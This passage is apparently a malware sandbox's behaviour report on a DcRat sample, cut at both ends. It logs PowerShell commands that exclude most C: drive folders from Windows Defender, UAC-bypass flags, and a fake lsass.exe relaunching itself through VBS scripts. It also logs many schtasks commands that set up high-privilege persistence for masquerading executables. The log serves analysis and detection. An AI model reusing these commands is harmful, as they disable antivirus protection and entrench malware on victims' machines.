  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2856
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2156
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2532
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2568
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2160
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2500
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1752
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2164
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\FN9fgPIX1e.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2188
- - C:\Windows\system32\w32tm.exe
    w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
    3⤵
    PID:1772
- - C:\Users\Admin\AppData\Local\Temp\6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe
    "C:\Users\Admin\AppData\Local\Temp\6db47bae41ef69eb40bbb7a664032dd23799c6d8a04327878abf3c0cf264be18.exe"
    3⤵
    - UAC bypass
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - System policy modification
    PID:2332
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1704
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3060
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2596
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2264
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2700
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2688
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3064
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2136
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1720
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1988
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2008
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2032
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\2cfOw3EDP6.bat"
      4⤵
      PID:852
    - - C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        5⤵
        
        PID:696
    - - C:\Users\Public\lsass.exe
        
        "C:\Users\Public\lsass.exe"
        5⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:292
      - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f370d26e-3518-4c05-890f-9aecd8bd2b27.vbs"
        6⤵
        
        PID:2868
        
        C:\Users\Public\lsass.exe
        
        C:\Users\Public\lsass.exe
        7⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:960
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e94d9f44-7db9-4d10-8ba1-c0efb0e0e4fc.vbs"
        8⤵
        
        PID:1844
        
        C:\Users\Public\lsass.exe
        
        C:\Users\Public\lsass.exe
        9⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:2464
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e807ff41-8939-4b3a-af0a-7ed0b6e7bfe0.vbs"
        10⤵
        
        PID:1156
        
        C:\Users\Public\lsass.exe
        
        C:\Users\Public\lsass.exe
        11⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:1416
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ed33cc5c-d799-44d3-857a-f64e1b28516f.vbs"
        12⤵
        
        PID:2976
        
        C:\Users\Public\lsass.exe
        
        C:\Users\Public\lsass.exe
        13⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:2332
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f8eb9bf6-fb61-4b79-8793-e4efdfcd3593.vbs"
        14⤵
        
        PID:840
        
        C:\Users\Public\lsass.exe
        
        C:\Users\Public\lsass.exe
        15⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:2612
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e42533c9-6875-4988-b916-1065fb4d5950.vbs"
        16⤵
        
        PID:2800
        
        C:\Users\Public\lsass.exe
        
        C:\Users\Public\lsass.exe
        17⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:1424
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28577dc5-1a69-49e2-9409-e37894db18e5.vbs"
        18⤵
        
        PID:2764
        
        C:\Users\Public\lsass.exe
        
        C:\Users\Public\lsass.exe
        19⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:1788
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\568720e5-24b9-4275-984b-7ae09a384066.vbs"
        20⤵
        
        PID:1244
        
        C:\Users\Public\lsass.exe
        
        C:\Users\Public\lsass.exe
        21⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:2088
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\46bfda2a-451d-4a31-a992-7b1fe2038d66.vbs"
        22⤵
        
        PID:2580
        
        C:\Users\Public\lsass.exe
        
        C:\Users\Public\lsass.exe
        23⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:1564
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3fed4d47-ba95-4812-a759-5216bf02fad7.vbs"
        24⤵
        
        PID:1084
        
        C:\Users\Public\lsass.exe
        
        C:\Users\Public\lsass.exe
        25⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:1932
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2a39dcbd-4c0e-4157-8789-4bac41b2f292.vbs"
        26⤵
        
        PID:3060
        
        C:\Users\Public\lsass.exe
        
        C:\Users\Public\lsass.exe
        27⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:1992
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\34d8183a-2b56-49af-a8d7-572cea5f33ed.vbs"
        28⤵
        
        PID:2308
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3156caa4-942d-4095-8926-c39fc405b032.vbs"
        28⤵
        
        PID:2404
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\cbd24002-1086-4ab0-b70b-a38d0160c91f.vbs"
        26⤵
        
        PID:1028
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1561e92b-f9ab-4c90-8b3b-5cd843c1d92e.vbs"
        24⤵
        
        PID:1340
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2078b55f-539a-4bf0-91b9-2ea4bfbecc8c.vbs"
        22⤵
        
        PID:1808
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\465a3c89-1038-4f34-bcab-e9ac845c8694.vbs"
        20⤵
        
        PID:2416
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2bd26b60-b0ba-45a8-bfef-88b463470a4e.vbs"
        18⤵
        
        PID:2960
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8c2974a3-d773-4e71-8f31-8f97a4b1a3ab.vbs"
        16⤵
        
        PID:3036
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\305265ae-aed9-4eb5-a4cb-0dfa26d75f1a.vbs"
        14⤵
        
        PID:2520
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\866b8801-816d-4b35-a78b-ceb6feec4590.vbs"
        12⤵
        
        PID:2196
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e1130677-f2b7-481e-806d-a232bc2c645f.vbs"
        10⤵
        
        PID:1252
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20b93edd-5a74-4b9d-a7fe-98c830339d67.vbs"
        8⤵
        
        PID:912
      - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\42ebdc95-ac93-49a7-9df1-c7f1430a86c4.vbs"
        6⤵
        
        PID:1632

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\dwm.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:2820

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\Microsoft\dwm.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:2828

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\dwm.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3028

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 6 /tr "'C:\Program Files\Microsoft Games\Hearts\services.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:2928

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files\Microsoft Games\Hearts\services.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2432

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\Program Files\Microsoft Games\Hearts\services.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2648

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\csrss.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2636

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Admin\csrss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:2780

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2724

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Photo Viewer\ja-JP\lsm.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2664

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\ja-JP\lsm.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2028

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Photo Viewer\ja-JP\lsm.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:1412

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Users\Default User\csrss.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1220

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Default User\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:1424

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:800

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\Windows\SchCache\services.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1256

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Windows\SchCache\services.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2940

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 11 /tr "'C:\Windows\SchCache\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:596

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\Program Files\Microsoft Games\Chess\de-DE\lsass.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:1684

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files\Microsoft Games\Chess\de-DE\lsass.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1712

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 7 /tr "'C:\Program Files\Microsoft Games\Chess\de-DE\lsass.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:532

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Sidebar\services.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:1528

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Sidebar\services.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2140

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Sidebar\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2036

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\winlogon.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1408

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\winlogon.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1756

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\winlogon.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2996

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Google\csrss.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2132

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:1976

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Google\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:1992

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Libraries\spoolsv.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1856

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Users\Public\Libraries\spoolsv.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1496

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 10 /tr "'C:\Users\Public\Libraries\spoolsv.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:2052

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Journal\de-DE\services.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2080

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files\Windows Journal\de-DE\services.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:544

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Journal\de-DE\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:1660

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:956

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\spoolsv.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2280

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 7 /tr "'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\spoolsv.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1588

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\System.exe'" /f
1⤵
- Process spawned unexpected child process
PID:356

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\System.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:2032

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1988

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Photo Viewer\fr-FR\audiodg.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2472

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Program Files\Windows Photo Viewer\fr-FR\audiodg.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1792

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Photo Viewer\fr-FR\audiodg.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1292

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 9 /tr "'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\taskhost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1924

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\taskhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1836

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 5 /tr "'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\taskhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2644

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\smss.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1248

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1916

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\smss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2808

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 9 /tr "'C:\Windows\L2Schemas\winlogon.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2636

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\L2Schemas\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2040

C:\Windows\system32\schtasks.exe
